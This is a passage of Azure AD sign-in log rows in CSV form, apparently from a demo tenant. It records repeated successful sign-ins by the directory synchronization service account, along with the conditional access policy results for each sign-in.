+828,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,221826c2-6fde-46b9-877f-bfe6cd3420ff,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 01:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93d4df14-2ec3-46f2-a774-ff58a0230900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93d4df14-2ec3-46f2-a774-ff58a0230900,SigninLogs,Sucess,36.6404686,-78.26995087
+829,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,221826c2-6fde-46b9-877f-bfe6cd3420ff,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 01:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93d4df14-2ec3-46f2-a774-ff58a0230900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93d4df14-2ec3-46f2-a774-ff58a0230900,SigninLogs,Sucess,36.6404686,-78.26995087
+830,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,008c635e-a0a5-4fcf-898e-dcdec0da8d1a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 01:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0c3d33fc-950a-42ac-8839-1b7d92e20600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0c3d33fc-950a-42ac-8839-1b7d92e20600,SigninLogs,Sucess,36.6404686,-78.26995087
+831,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:00.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4facb61c-fe0b-4db0-b6df-73acca31b17a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 02:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93d60bd4-ad49-40a5-9c6c-157d9fbe0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93d60bd4-ad49-40a5-9c6c-157d9fbe0800,SigninLogs,Sucess,36.6404686,-78.26995087
+832,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:00.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4facb61c-fe0b-4db0-b6df-73acca31b17a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 02:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93d60bd4-ad49-40a5-9c6c-157d9fbe0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93d60bd4-ad49-40a5-9c6c-157d9fbe0800,SigninLogs,Sucess,36.6404686,-78.26995087
+833,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,47f31b04-66db-4b7d-a6fc-d4e86aff6bcd,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 00:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6052c246-a70b-451d-9677-f5a7663b0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6052c246-a70b-451d-9677-f5a7663b0800,SigninLogs,Sucess,36.6404686,-78.26995087
+834,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,45d1bf75-3345-4076-b220-0653b1c12437,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 01:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3d0c3f7f-0767-4d3e-a7bd-a84ba3ce0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3d0c3f7f-0767-4d3e-a7bd-a84ba3ce0600,SigninLogs,Sucess,36.6404686,-78.26995087
+835,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,04559467-e7f5-4383-92ff-2f1e6e0c2caf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 02:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 